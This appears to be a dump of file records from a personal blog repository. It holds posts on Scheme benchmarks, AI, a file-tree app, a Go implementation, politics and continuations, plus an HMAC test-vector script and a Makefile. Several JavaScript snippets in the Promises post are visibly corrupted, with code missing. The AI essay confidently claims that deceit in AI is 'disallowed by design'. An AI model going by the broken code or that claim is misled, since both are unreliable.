a lot yet to do to help programmers write code closer to the metal. What I do know is that current tools are only a glimpse of what we could have. The \"Profiles\" tab in WebKit's DevTools is notoriously seldom used, compared to any other tab. The information it gives is a struggle to work with. [Flame graphs](http://www.cs.brown.edu/~dap/agg-flamegraph.svg) are the beginning of an answer. The question being not \"where is my code slow\" but \"what can I do to make it faster\", making tools that give you clues on how to improve that [jsperf](http://jsperf.com/) score is an art that is yet to harness.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-12-12T16:48:00Z\",\n \"keywords\": \"go\" }\n</script>\n"
},
{
"alpha_fraction": 0.7303480505943298,
"alphanum_fraction": 0.7465780377388,
"avg_line_length": 87.17241668701172,
"blob_id": "878ca3c00412eecea487b547ae168e6253f3c957",
"content_id": "b46a81a844d47a4167f085e3e38b0d73d8c34dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5114,
"license_type": "no_license",
"max_line_length": 735,
"num_lines": 58,
"path": "/blog/src/schemes-performance-conformance-openness.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Schemes: Performance, Conformance, Openness\n\nAs [Guile 2.0.10][] just rolled out, I wished to re-acquaint myself with the status of Schemes. I downloaded the new version, compiled it (boy, is it slow to compile), installed it. It is designed as a language to extend existing programs, much like Lua. One goal is obviously to make the interpreter as fast as can be. Ideally, it should be the LuaJIT of Scheme-land.\n\nThe other approach used to make Scheme run fast is to compile it. Other projects, such as Chicken Scheme, compile the code to C, and the result tends to have reasonable performance. They do also cut corners, as we'll see.\n\nLet's make one of the most simple non-trivial program. A looped factorial.\n\n (define (fact n)\n (let ((acc 1))\n (let loop ()\n (set! acc (* acc n))\n (set! n (- n 1))\n (if (zero? n) acc\n (loop)))))\n\nGuile has a number of handy helpers in REPL mode. Notably, `,h` will list all special commands that are available. That includes `,describe`, which gives documentation. For instance, `,describe get-internal-real-time` will tell you that it \"returns the number of time units since the interpreter was started\". Let's use that.\n\n (define (time-fact n)\n (let ((t (get-internal-real-time)))\n (fact n)\n (display (- (get-internal-real-time) t))\n (newline)))\n\nThe results of running `(time-fact 50000)` in the REPL are not astounding. About 2.62 seconds.\n\nFaced with `(fact 50000)` defined with recursion, Guile threw an error, which is more that can be said of Chicken Scheme, which caused a segmentation fault and died.\n\nChicken Scheme (or `csi` for short) does not follow the so-called numerical tower by default. For instance, numbers are converted to a floating-point representation when they go beyond the limit. As a result, the same code as before (adapted using its `time` function, which does the same thing as Common Lisp's, that is, it computes the time needed to perform some operation given as an argument) seems very fast: \"0.021s CPU time\". However, it returns a mere `+inf.0`.\n\nFortunately, what seems great about Chicken is its wealth of downloadable packages (called \"eggs\"). The first one you'll want to download is readline, to make the interpreter that much easier to use (it includes autocompletion and bracket highlighting).\n\n chicken-install readline\n\n(You should [read more here][readline] to see how to set it up for `csi`. Also, to be fair, Guile does one better and has readline support by default, although for some unfathomable reason, you need to input `(use-modules (ice-9 readline) (activate-readline)` to get it.)\n\nYou can also install the numerical tower with `chicken-install numbers` (a concept which I find mind-boggling, although certainly not ideal from a language design perspective: having bignums shouldn't be a switch-on feature (especially considering that there is no switch-off), but a data structure choice) and use it with `(use numbers)`. Of course, when using bignums, `csi` is quite slower: 2.86 seconds, with a whole second dedicated to garbage collection. As a side-note, printing the number takes about 20 seconds. All other players do it nearly instantly. Then again, not that much of a surprise: Chicken Scheme is not designed for interpreted situations. It is the worst result of the bunch, although not that far behind Guile.\n\n[readline]: http://wiki.call-cc.org/eggref/4/readline\n\nPetite Chez Scheme (or `petite` for short) is a fairly well optimized interpreter. It has a `(real-time)` procedure that works similarly to Guile's `(get-internal-real-time)`. With it, I could declare it the winner, with an average of 1.90 seconds. What is interesting, however, and shows how optimized it is, is that the recursive version doesn't blow up the stack. I can only assume that it has some curious engineering that detects that it can convert it to a loop. What is amazing is that, although slower than the looped version, the recursive version does far better than Guile's looped version, with an average of 2.22 seconds.\n\nHowever, `petite` is not open-source. The code is not for you to see. I would love the best Scheme interpreter to be open-source. Because reading software is my bedtime story.\n\nOf course, Common Lisp's SBCL does no compromise, and blows everyone away, with 1.044 seconds of real time (2,296,459,842 processor cycles, it also says, and I wonder with awe how it got that information). And the recursive version is about 1.26 seconds.\n\nSure, this is a contrived example. It is more of a stress-test of the bignum code. It is also roughly what I expected, and it might actually be representative of the level of optimization involved in each project. I'm sure there'll be a lot more work in the future, and that makes me hopeful.\n\nHere's to Guile becoming the new SBCL!\n\n[Guile 2.0.10]: http://lists.gnu.org/archive/html/info-gnu/2014-03/msg00006.html\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-03-18T16:53:00Z\",\n \"keywords\": \"lisp\" }\n</script>\n"
},
{
"alpha_fraction": 0.7934683561325073,
"alphanum_fraction": 0.7976646423339844,
"avg_line_length": 115.61701965332031,
"blob_id": "e357bc730169fbdd814b9482fccab1e2c7ca89a2",
"content_id": "5ae9650d30e2b56907df5c7f7632d292a8e19131",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5485,
"license_type": "no_license",
"max_line_length": 866,
"num_lines": 47,
"path": "/blog/src/on-inorganic-intelligence.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# On Inorganic Intelligence\n\nThe world is a set of rules that modify a mutable state. In it, we are organic mammals with a complex lifecycle involving diploid somatic cells for individual survival, and haploid gametes to execute a species-wide genetic algorithm that optimizes our ability to survive in our environment, the interface between the solid and gaseous layers of Earth.\n\nWe have evolved through the best optimization algorithm we know of, a combination of an evolutionary algorithm and a chemical neural network electrically connected to sensory receptors and muscles. In order to force us to worry about our survival, the neural network is hijacked by the production of endogenous chemicals. Serotonin, for instance, forces our brain to look for food and mating partners. There are different chemicals involved in forcing us to act when in front of food, and in switching to different activities afterwards. There are chemicals that make us fear dark, strangers, blood. All those hijacking chemicals are regulated by endocrine glands, ie. organs that produce hormones, those molecules that modify and set our behaviour. For instance, the thyroid (just below the Adam apple on men) influences dopamine production, regulating mood swings.\n\nA bad thyroid can lead to bipolar disorder or schizophrenia. Madness is simply acute humanity.\n\nWhat is the point of my saying this?\n\nHumans are machines with complex software and complex hardware. Of course, we don't consider our *hardware* to be intelligent — we understand the reproduction and specialization of our cells to be the deterministic result of chemical interactions. I never quite understood why we often don't extrapolate that understanding to our software.\n\n---\n\nThese days, great people wish to raise awareness of the dangers of artificial intelligence. It is akin to worrying about the supply of entertainment to Ganymede, as what is feared requires technology that cannot happen within a hundred years. But what is that technology exactly?\n\nWhat we call artificial intelligence can designate two things:\n\n1. An algorithm able to solve non-trivial optimization problems.\n2. An automaton capable of self-sustenance and coherent dialogue which passes the Turing test.\n\nWe use the former daily. CCTV, drones, language processors such as Google, speech recognition systems in Siri or Cortana, Facebook's face detectors or your email's spam filter, all include either genetic algorithms, neural networks, hidden Markov models or other machine learning systems that we consider artificial intelligence.\n\nThey do their task well. Any deficiency gets improved. No fear results from their use.\n\nThe latter somehow baffles minds, while being an application of the former. I believe that the fear it generates is religious. Surely Babel's disaster happened because we were not meant to create? Yet we have created so much that it has become our primary job. Am I no longer a unique snowflake if something I made can think? if it can be mass-produced? If the machines can win at chess or Jeopardy, [as they inexorably tend to][KenJennings], are we gods murdered by their creation? \n\n[KenJennings]: https://youtu.be/b2M-SeKey4o?t=4m35s\n\nHowever, I, who writes this, am an artificial intelligence. I am a self-sustaining automaton capable of intelligible thought. You are organic and so am I. I was not designed by humans, but by the same algorithms that we use to make the robots that help you on the Web.\n\nFear no AI for you are one. Were we to create an inorganic automaton with which we could talk, the most outstanding difference it would have would be an aim. It would be made to keep you company while driving, or to detail the benefits of varying products on the market. You don't have a goal, as your species was formed randomly. They, on the other hand, are designed to please you; dysfunctional models would be thrown out. Deceit is disallowed by design.\n\nWhile the imagination of some runs wild as to a hypothetic AI, there is a very real AI out in the wild causing tremendous risks to our health, and it is us. I have never lived a second of my life in a world where humans did not have the capacity to make Earth inhabitable. The atomic bomb was created long before me, and continues to be improved yearly. We are an AI gone rogue, but we survived it, because our stupidity was marginal; we are optimized for survival.\n\nAdditionally, while our inorganic AIs have a training phase of decades, our species has been through the best optimization algorithms for 3.7 billion years. It will be tremendously hard to make an automaton as energy-efficient *and* smart as us.\n\nEven if we did, we pick the fitness landscape — the things that we want those inorganic automata to optimize. While we are optimized for survival on Earth, they would optimize our food supply, our economy, our diplomacy. Designing a fitness landscape that could harm us is as absurd as making double-edged knives with no handles. Just as I do not want to drive in a car whose airbag system could fail, we will replace an AI that fails our economy. And that AI would only replace humans doing a poorer job.\n\nShould we fear intelligence? The gory depiction offered by Hollywood blockbusters only regurgitate the fear of Genesis' forbidden apple. Let us be smarter than that.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-05-20T23:40:00Z\",\n \"keywords\": \"ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.749669075012207,
"alphanum_fraction": 0.7787888646125793,
"avg_line_length": 57.11538314819336,
"blob_id": "bb6baa0b07d44c481bd337adf42c649c33ce64f1",
"content_id": "3791864b1a934c5a72a841c294703d7b3c2e3418",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6052,
"license_type": "no_license",
"max_line_length": 326,
"num_lines": 104,
"path": "/blog/src/thefiletree-design-log-4.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 4: Accounts\n\nI mentionned needing to add accounts in [design log 2][]. It is [now implemented][authentication].\n\n[design log 2]: ./thefiletree-design-log-2.html\n[authentication]: https://github.com/garden/tree/commit/04a03786d81733aeca35b1ac4fe5b95c57d0e706\n\nYou go to `/app/account/`, which contains either your account information if you are logged in, or a form to get registered.\n\n\n\n\n\nYou get an email with a link back to the website, which gives you a httpOnly secure cookie with a token that the database will recognize and associate to a JSON blob containing your information (email, user name).\n\n\n\n\n\n\n\nAs planned, I use email-login, which I improved for this purpose by adding support for [CockroachDB][], a serializable distributed SQL database that I plan on using more (maybe for file metadata).\n\n[CockroachDB]: https://www.cockroachlabs.com/\n\nAll files [now][ACL] have an Access Control List (ACL) so that you can set the default access (none (404), reader, writer (can see and edit), owner (can also change the metadata, and therefore the ACL).\n\n[ACL]: https://github.com/garden/tree/commit/6fbe24c41dfa7085533a6a0157daefc5a28ed7a4\n\n\n\nACLs on folders apply to all subfiles unless an explicit ACL overrides it. It works like variable scoping: the nearest containing metafolder with an explicit ACL that applies to you determines your access.\n\nIt works by setting the `acl` JSON object in the metadata. It is a map from username to right: `-` for none, `r` for reader, `w` for writer, `x` for owner. Does it remind you of Unix permissions?\n\n\n\nThe `*` key is for other users (logged in or anonymous).\n\n## Canop Finishing Touches\n\nCode and bugs are lovers. The monster that I am had to crush a handful of the latter, but it really was to save the former.\n\nFor instance, **undo/redo** was semantically wrong.\n\nWhy? Of course, CodeMirror supports undo/redo, but it keeps track of all changes. However, when you are editing code with others, you only want to undo *your own changes*. If you wrote a word and press *Undo*, you expect your word to be removed, not the operations that someone else did in the meantime.\n\nThat required [managing my own undo stack][]\n\n[managing my own undo stack]: https://github.com/espadrine/canop/commit/ed07dc80f8da61da15dee0703893315b1f863ba6\n\nAnother tricky situation arose while testing when I started using **multiple cursors**, a feature that every text editor under the sun stole from [SublimeText][] (although Wikipedia [mentions][simultaneous editing] MIT’s [LAPIS][] as the first to sport it, as part of their academic paper.)\n\n[SublimeText]: https://www.sublimetext.com/docs/2/multiple_selection_with_the_keyboard.html\n[simultaneous editing]: https://en.wikipedia.org/wiki/Simultaneous_editing\n[LAPIS]: https://en.wikipedia.org/wiki/Simultaneous_editing\n\nI received the editing operations CodeMirror gave me from the `change` events after it had already updated the editor. The operation positions I dealt with could not easily be mapped back to indices, as they related to the editor’s state before the change.\n\nI tried getting inspiration from [ot.js][], but ended up relying on a [simpler algorithm using the `beforeChange` event][].\n\n[ot.js]: https://github.com/Operational-Transformation/ot.js/blob/8873b7e28e83f9adbf6c3a28ec639c9151a838ae/lib/codemirror-adapter.js#L55\n[simpler algorithm using the `beforeChange` event]: https://github.com/espadrine/canop/commit/1bc109bfc6b075b1a59d4e2401f902edfdf8288a\n\nIt does have the downside that you don’t automatically have multiple changes that are semantically combined (like deleting multiple selections). Those end up having a single undo entry, for instance. I was getting used to reimplementing CodeMirror things, so naturally I implemented a [time-based operation grouping system][].\n\n[time-based operation grouping system]: https://github.com/espadrine/canop/commit/7beec5d1b8e231e0a52c6402931d5db77c2491da\n\n## Deploying To Production\n\nThe first version of TheFileTree was located on a server under our college\ndormroom desks; the second in a college server; the third on a friend’s\nsubletting server offer; the fourth on an OVH VPS. This one will be on Google\nCloud, starting with their free tier, where it should fit for some time before\nit, hopefully starts generating revenue to be self-sustaining.\n\nIt did require some subtle tweaking to support the fact that sending emails is\nseverely restricted on Google Cloud. There is a handful of partners that you\nhave to go through; I picked MailJet. I tweaked the `email-login` npm package\nand my DNS zone file to make it work.\n\nAs far as administrator interfaces are concerned, Google Cloud is extremely\npolished, offering a clean interface with good configuration, and even a\nconvenient remote SSH-in-a-tab.\n\nWhile it is still slightly slower to get up and running with a fresh instance\nthan on Digital Ocean, it is a step up from OVH. That said, OVH offers a\npredictable fixed cost and no egress cost, while GCP will have complicated costs\nto manage once I need to look after them.\n\nSadly, to get on the free tier, I was required to host the servers in South\nCarolina, US. There is a subtle bit more latency as a result from France.\n\nAll in all, it was a very interesting choice to have. The website is now much\nmore robust than it was before. The only dark spot is the single-node\nCockroachDB server, which dies on a regular basis, seemingly because it does not\nlike to be alone. I will have to investigate further later.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-03-01T23:19:58Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.7639090418815613,
"alphanum_fraction": 0.7700371146202087,
"avg_line_length": 47.069766998291016,
"blob_id": "07c540fa1e39ec02fc75edd1de040b6f86e01a46",
"content_id": "de7b85da798d9bb0507d85b86f4a3f4795c74e77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6202,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 129,
"path": "/blog/src/how-to-implement-go.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# How to implement Go\n\nAs I wanted to make an automated Go player, as I planned [on a previous\narticle][A Go Browser Battle], I first needed a full implementation of the game\nof Go.\n\n[A Go Browser Battle]: http://espadrine.github.io/blog/posts/a-go-browser-battle.html\n\nGo is a beautiful, tremendously old game with very simple rules and yet\ntremendous subtlety. Here are the rules:\n\n1. Each of two players, black or white, take turns either passing or placing a\n stone of their color on an intersection of a 19×19 board, starting with\n black.\n2. A **group** is a set of stones that are next to each other (up, down, left or\n right), or next to a stone that is in the group. A group's **liberties** are\n the number of disctinct empty intersections next to the group's stones. When\n a player places a stone, all enemy groups that no longer have any liberties\n are **captured**: they are removed from the board.\n3. A player is not allowed to place a stone if it causes the start of next turn\n to include a group with no liberties. That forbids **suicides**.\n4. A player is not allowed to place a stone if it causes the start of next turn\n to have a board configuration that already occurred during the game. This is\n known as a **Ko** when the configuration happened on the previous turn, and\n as a **Superko** more generally. It ensures that games must end; there are no\n draws.\n5. When nobody can add stones, the player with the most stones, enclosed\n intersections (aka. **territory**), captured stones, and **Komi** (an added\n bonus to white to compensate for the asymmetry of who starts first), wins.\n The Komi usually has a half point to ensure that there can be no equal\n scores, again to forbid draws.\n\n## The board\n\n\n\nSince the board is a compact 2-dimensional space, we use an array, with each\nslot containing an intersection which includes its state (empty, with a white\nstone, etc.) and historical and analytical information for use by the learning\nsystems: whether it is a legal move, when it last received a move, whether it is\nthe **atari** liberty of a group, ie. the move that captures the group, and how\nmany stones it captures.\n\nWe also keep track of all groups on the board. Each intersection links to its\ngroup, and the group maintains a set of its stones, and another of its\nliberties. When registering a move, groups are updated. It is fast, since at\nmost four groups may need updating.\n\nThere is some logic to merge groups together, destroying the original groups,\nand creating a new one that contains the union of the previous ones. It is not\nparticularly fast (and could likely be improved by keeping the largest group and\nadding the others to it), but since merging groups does not happen on every\nturn, it did not seem to matter that much for now.\n\nCounting final or partial points also requires maintaining territory\ninformation. Yet again, we use a set to keep the intersections, and each move\nupdates the territory information corresponding to its surroundings.\n\n## Play\n\nThe most complicated function is inevitably the logic for computing a move. We\nmust look at surrounding intersections and their groups, to assess whether the\nmove is a suicide (and therefore invalid), and when it captures enemy stones.\n\nMost operations are essentially constant-time, apart from group merging, since\nthe number of impacted groups is bounded, and all operations are set updates.\n\n## Superko\n\nDetecting a match into previous board configurations is probably the trickier\npart of the system. Fortunately, a subtle algorithm for it already exists:\n**Zobrist hashing**.\n\nIt relies on a smart hashing system, where each possible board configuration is\nmapped to a unique hash. Trivial hashes would be too slow: your first guesses\nfor a hash probably require to read the whole board. Instead, a Zobrist hash is\nsimilar to a rolling hash, in that it only needs a single update to account for\nthe forward change.\n\nYou start with a hash of zero for the blank board. When initializing the board,\nyou generate a random 64-bit value (or, when you are like me and use JS, a\n32-bit integer) for each intersection on the board, and for each move that can\nbe made on that position (place a black stone, or place a white stone).\n\nTo compute the hash for a new board configuration, you take the hash of the\nprevious board. For every change on the board, you XOR the previous hash with\nthe random value associated with this particular change.\n\nFor instance, if you place a black stone on A19 and it captures a white stone on\nB19, you will XOR the hash with the random value for \"black A19\", and then XOR\nit with \"white B19\". *Fun fact*: it yields the same value if you do it the other\nway around.\n\n## Score\n\nThe bulk of scoring is establishing territories. To make things simple, we\nassume the game went to its final conclusion, where there are no gray zones. All\nregions are either surrounded by white or black, and there are no capturable\nstones left.\n\nAll that remains is to go through intersections in reading order, top to bottom,\nleft to right, and to stitch each empty spot to its neighbor territories,\npotentially joining two larger territories together if necessary. Any stone that\nis next to the territory gives it its color.\n\nIt makes counting points fairly easy: add komi, capture, stones on board, and\nown territory, and the trick is done.\n\n## Ongoing\n\nHaving implemented the game rules is not enough to properly train bots on it.\n\nFor starters, we need an **SGF parser** to extract information about the moves\nof existing games. SGF (Simple Game Format) is the main format for serializing\nGo games.\n\nThen, we want to support **GTP**: the Go Text Protocol is the most common format\nfor transmitting remote commands between a Go implementation and a robot player.\n\nFinally, we will explore various techniques for AI design.\n\nExpect fun!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-10-26T19:12:17Z\",\n \"keywords\": \"baduk, ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.7865588068962097,
"alphanum_fraction": 0.7921593189239502,
"avg_line_length": 122.61538696289062,
"blob_id": "c1c8264cdbe3eab484470c22f1bb08cb5817bf9e",
"content_id": "d19a9b42e9b772458b6bbfc98044db567be38309",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3234,
"license_type": "no_license",
"max_line_length": 646,
"num_lines": 26,
"path": "/blog/src/algorithmic-politics.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Algorithmic Politics\n\nI am fascinated by the ideas behind the “*Tragedy of the Commons*”. It describes the story of a few farmers acting in their self-interest, and failing to maximize their common good by depleting their shared resources.\n\nThis is as much a reflection on computer systems, long before they were invented, as it is on politics. (Its original formulation, in 1833, was intended as an economic study.)\n\nThe “*Tragedy of the Anticommons*”, a story of starvation caused by an excessive number of property owners, is similarly striking. Resource starvation, right?\n\nIt ties into politics even more deeply. In algorithmics, there is a concept of “*greedy algorithms*”, which are made to be simple to understand. They are often efficient. They work by seeking local optimality. Whatever gives immediate best results for us is the path we take.\n\nThey are notable for failing to find the global optimum in fitness landscapes which require foresight — in particular, NP-complete problems. Of course, maybe there is a greedy solution to all NP-complete problems — maybe there even is one to all NP-hard problems. After all, a concept of local optimality in one universe can be different from one in another. Transforming the problem may yield a greedy algorithm that finds the optimal solution, which it didn't reach before.\n\nPolitics seem mostly divided on that particular approach. The *right-wing* seems convinced that the capitalistic self-interest of every individual must be pursued greedily, that global optimality will be reached through this approach. What “self-interest” means is left open for interpretation; a self-interest in one universe can be transformed in another universe. What is torture according to one can be interrogation according to another.\n\nConservatism stems from the idea that up until now, things have been looking up; maybe we really did reach global optimality by following this approach. There is no reason, then, to part ways with the status quo. Tradition must therefore be preserved. Often, this is also tied to religion: by acting greedily, things have worked out all right; surely someone must be taking care of the order of things. This line of thinking protects us from fearing the future: if all of this is part of a deity's plan, despite the issues we face, we will eventually prevail, because we as animals have more value than animals that have gone extinct in the past.\n\nOn the other hand, the *left-wing* is generally afraid of the greedy approach, preferring complex rules and regulations that guarantee global optimality in the end. Unfortunately, those algorithms are usually not efficient, imperfect, and costly. Sometimes, there actually hasn't been any good solutions found on a particular problem. Sometimes, the solution assumes the good will and obedience of all citizens (cough cough, communism). Sometimes, we must compromise so much that we forget what we fight for.\n\nOf course, in politics and in computer science alike, there is no silver bullet. The werewolves always win.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-12-13T21:45:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.5951712727546692,
"alphanum_fraction": 0.6530039310455322,
"avg_line_length": 25.984848022460938,
"blob_id": "dfda584514c152cedcec2a1cfbfa51d69e0e6524",
"content_id": "26c5c2488fde2407afc112bb49b55e9296fa7af4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1781,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 66,
"path": "/blog/assets/webidentity/test-vectors.sh",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nhash () {\n message=\"$(echo -n \"$1\" | base64 -d)\"\n key=\"$(echo -n \"$2\" | base64 -d)\"\n echo -n \"$message\" | openssl sha256 -hmac \"$key\" | cut -f2 -d' ' | xxd -r -p |\n base64\n}\n\ndisplay () {\n name=\"$1\"\n value=\"${!name}\"\n echo \"$name\" = \"$(echo \"$value\" | tr +/ -_ | tr -d =)\"\n}\n\nbk=GVr2rsMpdVKNMYkIohdCLhOeHSBIL8KBjoCvleDbsJsK\nwk=DCmk1xzu05QmT578/9QUSckIjCYRyr19W0bf0bMb46MK\ndisplay bk\ndisplay wk\nuwk=$(hash $(echo -n example.org | base64) \"$bk\")\ndisplay uwk\nauid=$(hash $(echo -n AUID | base64) \"$uwk\")\ndisplay auid\nlid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\nlip=$(hash $(echo -n \"$lid\" | base64) \"$uwk\")\ndisplay lip\nliv=$(hash \"$auid\" \"$lip\")\ndisplay liv\nwuk=$(hash \"$auid\" \"$wk\")\ndisplay wuk\nuid=$(hash \"$auid\" \"$wuk\")\ndisplay uid\nlisk=$(hash $(echo -n \"$lid\" | base64) \"$wuk\")\ndisplay lisk\ntotp=$(hash $(echo -n \"Fri, 03 Jul 2020 14:32:19 GMT\" | base64) \"$lisk\")\ndisplay totp\n\necho\necho Log In\nnew_lid=\"Fri, 03 Jul 2020 15:27:43 GMT\"\nnew_lip=$(hash $(echo -n \"$new_lid\" | base64) \"$uwk\")\ndisplay new_lip\nnew_liv=$(hash \"$auid\" \"$new_lip\")\ndisplay new_liv\nnew_lisk=$(hash $(echo -n \"$new_lid\" | base64) \"$wuk\")\ndisplay new_lisk\n\necho\necho Browser Key Reset procedure\nreset_bk=0dP/ocrzSwieAuLUNCD6P660HLLOGl9zyfxYwdSLI0kK\ndisplay reset_bk\nreset_uwk=$(hash $(echo -n example.org | base64) \"$reset_bk\")\ndisplay reset_uwk\nreset_auid=$(hash \"AUID\" \"$reset_uwk\")\ndisplay reset_auid\nreset_lid=\"Fri, 03 Jul 2020 16:03:26 GMT\"\nreset_lip=$(hash $(echo -n \"$reset_lid\" | base64) \"$reset_uwk\")\ndisplay reset_lip\nreset_liv=$(hash \"$reset_auid\" \"$reset_lip\")\ndisplay reset_liv\nreset_wuk=$(hash \"$reset_auid\" \"$wk\")\ndisplay reset_wuk\nreset_uid=$(hash \"$reset_auid\" \"$reset_wuk\")\ndisplay reset_uid\nreset_lisk=$(hash $(echo -n \"$reset_lid\" | base64) \"$reset_wuk\")\ndisplay reset_lisk\n"
},
{
"alpha_fraction": 0.724252462387085,
"alphanum_fraction": 0.724252462387085,
"avg_line_length": 24.08333396911621,
"blob_id": "605dea5ba8b58e68200c0413181594454013ab14",
"content_id": "2d4d553d2d659a8f7ed025f247d05bccc74f9f4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 12,
"path": "/blog/assets/shishua-the-fastest-prng-in-the-world/Makefile",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "all: speed-partial.svg speed.svg speed-total.svg\n\nspeed-partial.svg: speed-partial.tsv speed-partial.plot\n\tgnuplot speed-partial.plot >$@ <$<\n\nspeed.svg: speed.tsv speed.plot\n\tgnuplot speed.plot >$@ <$<\n\nspeed-total.svg: speed-total.tsv speed-total.plot\n\tgnuplot speed-total.plot >$@ <$<\n\n.PHONY: all\n"
},
{
"alpha_fraction": 0.6922876238822937,
"alphanum_fraction": 0.6988014578819275,
"avg_line_length": 58.96875,
"blob_id": "333b204ddeb22df963bed4abafd939aa9a10bb93",
"content_id": "55109f4295d1424f472e1ef5630f96abbb198204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7682,
"license_type": "no_license",
"max_line_length": 444,
"num_lines": 128,
"path": "/blog/src/you-promised-better-than-this.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# You Promised Better Than This\n\nBefore learning [Promises](http://www.html5rocks.com/en/tutorials/es6/promises/), I decided to benefit from my ignorance for fun.\n\nI wrote a library meant to solve the problem I knew Promises solved.\n\nOf course, this isn't the first time [I looked at that issue](http://espadrine.tumblr.com/post/16233722246/array-processing-in-event-loops). However, that last study was not as in-depth as one might wish. I did encourage a standardization, at the node.js level — it ended up happening at the ECMAScript level, which I must admit is even better.\n\nHow much better? The only way for me to tell is to compare their design with the one I would naturally come up with. I know from force of habit that harnessing synchronization in an event-loop-driven, fully asynchronous world, is quite a bit of work. Making a generic library has to be harder still. Where to even start?\n\nI had been playing with Monads, and conceptually, it felt as if those would give the API you need. After all, giving a promise, combining promises: those two fundamental operations sound like return and bind…\n\nRed herring. The result felt as if I tried to fit a giraffe in a car. Driving that car was equally unpleasant. As a result, this is the last time you will read \"Monads\" in this blog post: \"Monads\". (If you're interested, you end up needing to put [some lipstick on the pig](https://blog.jcoglan.com/2011/03/11/promises-are-the-monad-of-asynchronous-programming/) to make it usable, making the complexity inside pointless.) There. Done. No more.\n\nI then started thinking about the concept of continuations. For the purpose of simplicity, it was not my intention to make them first-class. However, they would correctly orchestrate the execution flow of the program, cross-event-loop, through Continuation-Passing-Style.\n\nFundamentally, all I want is to store an action.\n\n // action: function(value, callback)\n // callback: function(value)\n function Cont(action) { this._action = action; }\n\nThe fact that this action takes a value isn't relevant: in JS, a value can be anything. It could be a continuation even. It could be undefined. Since the execution is delayed, where would I execute it? Yes, there is a function for that.\n\n Cont.prototype.run = function(value, cb) { this._action(value, cb); };\n\nOne implicit design choice that I couldn't free myself from is that the user *must* call `cb` in their code (in the action). Failing to do so would stop the execution of the continuation with no warning.\n\nNow I only needed to combine continuations in a sequential flow. I must not have been inspired, I picked a boring name, `then`. It takes an action, returns a continuation for that action. First, do my action. Then, do that action.\n\n Cont.prototype.then = function(action) {\n var first = this._action;\n return new Cont(function(value, cb) {\n first(value, function(newVal) {\n action(newVal, cb);\n });\n });\n }\n\n Notice how nothing is actually executed. This creates a flow of code, in which each new callback does the bridge between each action, passing the intended value, but no action is performed, no callback is called, up until the last minute. Besides, you can keep the resulting structure on the side, and call it in different situations.\n\nI need an example to keep you interested. Let's apply the silliest encryption in the world, in the most outrageous way. Let's add timeouts for no reason.\n\n function wait(f) { setTimeout(f, 100); }\n\nI also want to cut the cipher in lines of the same size.\n\n function ldiv(s, n) {\n var l = [];\n for (var i = 0; i {\n wait(() => cb(Array.prototype.map.call(value, i => i.charCodeAt(0))));\n })\n\nWe want each integer of the list to be \"encrypted\". Having no `map` in the async world, this could easily be annoying to write. However, it is pretty easy to implement one once and for all.\n\n Cont.prototype.map = function(action) {\n var first = this._action;\n return new Cont(function(value, cb) {\n first(value, function(newVal) {\n // newVal is a list. Else, treat it as a singleton.\n if (!(newVal instanceof Array)) { newVal = [newVal]; }\n var count = newVal.length;\n var retList = new Array(count);\n var end = function makeEnd(i) {\n return function(value) {\n retList[i] = value;\n count--;\n if (count {\n wait(() => cb(String.fromCharCode(element + 1)));\n })\n\nEach element of the list runs this action, and the continuation is triggered when they all returned their replacement in the array.\n\nLet's wrap up.\n\n operations = operations.then((value, cb) => cb(value.join(''))\n ).then((value, cb) => cb(ldiv(value, Math.sqrt(value.length)).join('\\n')));\n\nAaaand run.\n\n operations.run(\"Hello world and a good day to you all!\", alert);\n\nOnly when you run the final continuation do you actually execute all the actions.\n\nI am not too worried about errors. They are easy to add to a good design. Look at Go. Look at Rust. In this case, wrapping each action with a try / catch, and putting the error in an additional parameter, is enough. The error cascades with everything else. That way, we can even have a (potentially valid) value, along with an error.\n\n----\n\nLet's look at the Promise library.\n\nMy first surprise was how similar it was to my own 